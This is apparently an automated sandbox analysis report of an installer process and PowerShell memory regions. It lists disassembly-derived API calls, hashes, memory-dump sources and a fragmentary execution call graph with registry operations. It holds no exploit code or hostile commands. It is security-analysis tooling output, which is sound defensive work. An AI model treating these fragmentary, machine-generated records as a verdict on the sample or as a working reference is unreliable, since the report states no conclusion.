                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                              APIs
                                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00BB654A
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6596
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB65B8
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6713
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Free$Alloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 986138563-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(E5106CA8,E5106CA8,?), ref: 00BC468F
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,E5106CA8,?), ref: 00BC469C
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,?), ref: 00BC4773
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,E5106CA8), ref: 00BC44EA
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,E5106CA8), ref: 00BC44F7
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC4548
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,E5106CA8), ref: 00BC45DA
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,E5106CA8), ref: 00BC45E7
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC462E
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,E5106CA8,?), ref: 00BC441D
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,E5106CA8,?), ref: 00BC442A
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC4452
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00D7DB50
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00D7DB5B
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7DBC9
                                                                                                                                                                                • Part of subcall function 00D7DCAB: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D7DCC3
                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00D7DB76
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 677527491-0
                                                                                                                                                                              • Opcode ID: d7b80bd11d3c56be06c14d73a40700048800cc8670e53615a98b93b216a06df7
                                                                                                                                                                              • Instruction ID: 5bd197c05396813ac1fd7007559bac95732d8962b36610ea17c3fa0a46ab5d6e
                                                                                                                                                                              • Opcode Fuzzy Hash: d7b80bd11d3c56be06c14d73a40700048800cc8670e53615a98b93b216a06df7
                                                                                                                                                                              • Instruction Fuzzy Hash: 71019A366002249FC706FB60D88597CBB72EF84340B28801AE805B7391DF746E86CBE5
                                                                                                                                                                              APIs
                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00CC6381
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                                                              • String ID: ios_base::failbit set$iostream
                                                                                                                                                                              • API String ID: 2659868963-302468714
                                                                                                                                                                              • Opcode ID: c25f8b66e61d4c63b0c41c0a7f561b18bec19793a320644ae19bcb886ed1c0f1
                                                                                                                                                                              • Instruction ID: e19ca70326a89a44f19dfae27207eaec9d8bc001f176ee1ff27757c04c7013fb
                                                                                                                                                                              • Opcode Fuzzy Hash: c25f8b66e61d4c63b0c41c0a7f561b18bec19793a320644ae19bcb886ed1c0f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 35D1CE71D00248DFDB14DFA8C985BAEFBB5EF49310F24826DE815AB381E7745A44CBA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: :${
                                                                                                                                                                              • API String ID: 0-3766677574
                                                                                                                                                                              • Opcode ID: 11a78f0e98aa45d5334c5bce5e5f6a449a32b2af1cfcd01e380ddb108dd02b0f
                                                                                                                                                                              • Instruction ID: a7f19bccd971bf43672cde2e9f2a6dfa63588c38322cf3fd471d6dd09a9c1a11
                                                                                                                                                                              • Opcode Fuzzy Hash: 11a78f0e98aa45d5334c5bce5e5f6a449a32b2af1cfcd01e380ddb108dd02b0f
                                                                                                                                                                              • Instruction Fuzzy Hash: 8661B274A002169BCF299F54C894BFDB7F8EB09714F1444AAE902FB281EBB5DD40CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00D93EFD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                              • String ID: pow
                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                              • Opcode ID: 874f693169cccc1b6ef5ffa0ca1f87f15d5a8a84742be531d644787027131b77
                                                                                                                                                                              • Instruction ID: 84a03ab6538519312d352eb6fe1c99126d8e626fc71fb37164bea0ec111e0e17
                                                                                                                                                                              • Opcode Fuzzy Hash: 874f693169cccc1b6ef5ffa0ca1f87f15d5a8a84742be531d644787027131b77
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F517971E082029ACF117F18C9013BA3BA1DF50740F388D99F4D5862E9EB358D999A76
                                                                                                                                                                              APIs
                                                                                                                                                                              • PathIsUNCW.SHLWAPI(?,E5106CA8), ref: 00CBD2D1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path
                                                                                                                                                                              • String ID: \\?\$\\?\UNC\
                                                                                                                                                                              • API String ID: 2875597873-3019864461
                                                                                                                                                                              • Opcode ID: bd74ab427833c63857a7c70c3c72800a2a3c80068182601d87c4bdd7aa23f956
                                                                                                                                                                              • Instruction ID: 1a22a09711995a66ac0981e0da6cb98fe45323872d3c88fbbb9e7040376bfb41
                                                                                                                                                                              • Opcode Fuzzy Hash: bd74ab427833c63857a7c70c3c72800a2a3c80068182601d87c4bdd7aa23f956
                                                                                                                                                                              • Instruction Fuzzy Hash: F451E370D046049BDB14DF68C885BEEB7F5FF95304F10861DE81267281EBB56949CBE1
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenEventW.KERNEL32(00000000,00000000,E5106CA8,_pbl_evt,00000008,?,?,00E2FC80,00000001,E5106CA8,00000000), ref: 00D227FE
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 00D2281B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Event$CreateOpen
                                                                                                                                                                              • String ID: _pbl_evt
                                                                                                                                                                              • API String ID: 2335040897-4023232351
                                                                                                                                                                              • Opcode ID: 1d3f830ea85a595cbb53d48b06adf727770f6a0bb01b13e72c6dfc7259f5c174
                                                                                                                                                                              • Instruction ID: d9b6527cb4b79d9f9d64e806d737694702ec274a464c669708175f597479b2f0
                                                                                                                                                                              • Opcode Fuzzy Hash: 1d3f830ea85a595cbb53d48b06adf727770f6a0bb01b13e72c6dfc7259f5c174
                                                                                                                                                                              • Instruction Fuzzy Hash: A751A371D04618EFDB10DFA8DC86BAEB7B4FB14714F108269F915B7680DB746A04CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,E5106CA8,00E2F008), ref: 00CD43EC
                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00CD44E3
                                                                                                                                                                                • Part of subcall function 00CC0520: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00CC05F5
                                                                                                                                                                              Strings
                                                                                                                                                                              • Failed to get Windows error message [win32 error 0x, xrefs: 00CD440A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FormatFreeIos_base_dtorLocalMessagestd::ios_base::_
                                                                                                                                                                              • String ID: Failed to get Windows error message [win32 error 0x
                                                                                                                                                                              • API String ID: 201254970-3373098694
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BE6C6B
                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE6CCE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                              • API String ID: 3988782225-1405518554
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BBAD10: InitializeCriticalSectionAndSpinCount.KERNEL32(00E9FEF0,00000000,E5106CA8,00BA0000,00DA7E40,000000FF,?,00D7F5B2,?,?,?,00BA7726), ref: 00BBAD35
                                                                                                                                                                                • Part of subcall function 00BBAD10: GetLastError.KERNEL32(?,00D7F5B2,?,?,?,00BA7726), ref: 00BBAD3F
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00BA7726), ref: 00D7F5B6
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BA7726), ref: 00D7F5C5
                                                                                                                                                                              Strings
                                                                                                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D7F5C0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                              • API String ID: 450123788-631824599
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,?,00BB83B7,?,?,00BB8164,?), ref: 00D7F907
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F90E
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00BB8164,?), ref: 00D7F954
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F95B
                                                                                                                                                                                • Part of subcall function 00D7F7A0: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7C4
                                                                                                                                                                                • Part of subcall function 00D7F7A0: HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F7CB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1864747095-0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835635773.00007FFD9B4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4B0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b4b0000_powershell.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: n
                                                                                                                                                                              • API String ID: 0-2013832146
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835307304.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835307304.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835635773.00007FFD9B4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4B0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b4b0000_powershell.jbxd
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835307304.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: d86aa18d61a20f9b15eee371dca04646afabf0250d1d4367390238785f2b1aea
                                                                                                                                                                              • Instruction ID: 504c69c630c201274899816f2b1d2c33b656fd1de4ecb1b0de7c900d528c075a
                                                                                                                                                                              • Opcode Fuzzy Hash: d86aa18d61a20f9b15eee371dca04646afabf0250d1d4367390238785f2b1aea
                                                                                                                                                                              • Instruction Fuzzy Hash: 5B418131E18A0D8FDFA8EF68D451AE9B7A1FF55304F1041BAD00DD7296CA35A981CB80
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835307304.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 46279e8dfcbac31cef5c8a2db28f50d011e00b5a6c4941bd45b542a181d8802f
                                                                                                                                                                              • Instruction ID: 3bd4d38704dc81a4cd338541b2b953e5e7d87ac86ff887b744ca0720305fa85c
                                                                                                                                                                              • Opcode Fuzzy Hash: 46279e8dfcbac31cef5c8a2db28f50d011e00b5a6c4941bd45b542a181d8802f
                                                                                                                                                                              • Instruction Fuzzy Hash: FE01AC3011CB0C4FD748EF4CD051AA5B7E0FB95320F10056DE59AC3551D636E881C741
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835307304.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 864913ead6a091816814587d18003a54ef0e71d096611e7a0c28f40185f81593
                                                                                                                                                                              • Instruction ID: 046b446ce7012926f7cd709559234ebf34295cee54552d3e37acab48da72ace7
                                                                                                                                                                              • Opcode Fuzzy Hash: 864913ead6a091816814587d18003a54ef0e71d096611e7a0c28f40185f81593
                                                                                                                                                                              • Instruction Fuzzy Hash: 79E0123272C8144FDF58FB5CF893AE5B391EB94320B0406A6E44AC7195E916EE82C7C5

Execution Graph

Execution Coverage:3.3%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:0.1%
Total number of Nodes:1126
Total number of Limit Nodes:23
75267->75232 75271 10f52f RegCloseKey 75267->75271 75268->75245 75274 10f657 75268->75274 75275 10f646 RegDeleteValueW 75268->75275 75272 10f789 75269->75272 75273 10f86f 75270->75273 75271->75232 75276 10f790 75272->75276 75281 d8770 58 API calls 75272->75281 75277 10f943 75273->75277 75278 10f879 75273->75278 75280 10f6aa RegCloseKey 75274->75280 75274->75283 75275->75268 75276->75144 75279 d2570 42 API calls 75277->75279 75286 10fa90 69 API calls 75278->75286 75282 10f94d 75279->75282 75280->75283 75284 10f7a4 75281->75284 75285 d43d0 56 API calls 75282->75285 75283->75144 75284->75276 75290 10f7c4 RegCloseKey 75284->75290 75287 10f97f 75285->75287 75288 10f899 75286->75288 75289 10fa84 75287->75289 75295 10f989 75287->75295 75296 10f8a0 75288->75296 75307 d8770 75288->75307 75292 d2570 42 API calls 75289->75292 75290->75276 75293 10fa8e 75292->75293 75294 10f8b4 75297 10f8c3 RegDeleteValueW 75294->75297 75298 10f8bf 75294->75298 75299 10fa90 69 API calls 75295->75299 75296->75144 75297->75298 75298->75296 75301 10f8df RegCloseKey 75298->75301 75300 10f9a9 75299->75300 75302 10f9b0 75300->75302 75303 d8770 58 API calls 75300->75303 75301->75296 75302->75144 75304 10f9c7 75303->75304 75304->75302 75305 10fa20 RegCloseKey 75304->75305 75305->75302 75306->75142 75308 d43d0 56 API calls 75307->75308 75309 d87b7 75308->75309 75310 d880c 75309->75310 75312 d87bd 75309->75312 75311 d2570 42 API calls 75310->75311 75313 d8816 75311->75313 75314 d9490 42 API calls 75312->75314 75315 d87dd RegOpenKeyExW 75314->75315 75315->75294 75316->75243 75317->75256 75318->75253 75319->75267 75320 167c2d 75321 167c39 ___scrt_is_nonwritable_in_current_image 75320->75321 75346 167626 75321->75346 75323 167c40 75324 167d93 75323->75324 75333 167c6a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 75323->75333 75406 168138 4 API calls 2 library calls 75324->75406 75326 167d9a 75399 178ead 75326->75399 75330 167da8 75331 167c89 75332 167d0a 75354 168253 
